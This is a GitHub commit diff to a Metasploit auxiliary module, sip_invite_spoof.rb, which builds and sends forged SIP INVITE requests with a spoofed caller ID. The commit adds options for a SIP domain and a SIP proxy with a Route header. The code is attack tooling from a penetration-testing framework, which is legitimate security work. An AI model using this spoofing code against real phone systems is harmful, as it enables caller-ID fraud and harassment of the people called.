Skip to content

Commit 08d56e3

Browse files
author
Chris John Riley
committed
recreated in new branch
removed space at EOL
1 parent b75c622 commit 08d56e3

File tree

1 file changed

+28
-5
lines changed

1 file changed

+28
-5
lines changed

modules/auxiliary/voip/sip_invite_spoof.rb

Lines changed: 28 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -21,8 +21,8 @@ def initialize
2121
},
2222
'Author' =>
2323
[
24-
'David Maynor <dave[at]erratasec.com>',
25-
'ChrisJohnRiley'
24+
'David Maynor <dave[at]erratasec.com>', # original module
25+
'ChrisJohnRiley' # modifications
2626
],
2727
'License' => MSF_LICENSE
2828
)
@@ -33,7 +33,13 @@ def initialize
3333
Opt::RPORT(5060),
3434
OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']),
3535
OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]),
36-
OptString.new('EXTENSION', [false, "The specific extension or name to target", nil])
36+
OptString.new('EXTENSION', [false, "The specific extension or name to target", nil]),
37+
OptString.new('DOMAIN', [false, "Use a specific SIP domain", nil])
38+
], self.class)
39+
register_advanced_options(
40+
[
41+
OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),
42+
OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])
3743
], self.class)
3844
end
3945

@@ -45,19 +51,36 @@ def run_host(ip)
4551
name = datastore['MSG']
4652
src = datastore['SRCADDR']
4753
ext = datastore['EXTENSION']
54+
dom = datastore['DOMAIN']
55+
sphost = datastore['SIP_PROXY_NAME']
56+
spport = datastore['SIP_PROXY_PORT'] || 5060
57+
conn_string = ''
4858

4959
if not ext.nil? and not ext.empty?
5060
# set extesion name/number
51-
conn_string = "#{ext}@#{ip}"
61+
conn_string = "#{ext}@"
62+
end
63+
64+
if not dom.nil? and not dom.empty?
65+
# set domain
66+
conn_string << "#{dom}"
5267
else
53-
conn_string = "#{ip}"
68+
conn_string << "#{ip}"
69+
end
70+
71+
# set Route header if SIP_PROXY is set
72+
if not sphost.nil? and not sphost.empty?
73+
route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"
5474
end
5575

5676
connect_udp
5777

5878
print_status("Sending Fake SIP Invite to: #{conn_string}")
79+
print_status("Using SIP proxy #{sphost}:#{spport}") if route
5980

6081
req = "INVITE sip:#{conn_string} SIP/2.0" + "\r\n"
82+
# add Route: header to req if SIP_PROXY is set
83+
req << route if route
6184
req << "To: <sip:#{conn_string}>" + "\r\n"
6285
req << "Via: SIP/2.0/UDP #{ip}" + "\r\n"
6386
req << "From: \"#{name}\"<sip:#{src}>" + "\r\n"

0 commit comments

Comments
 (0)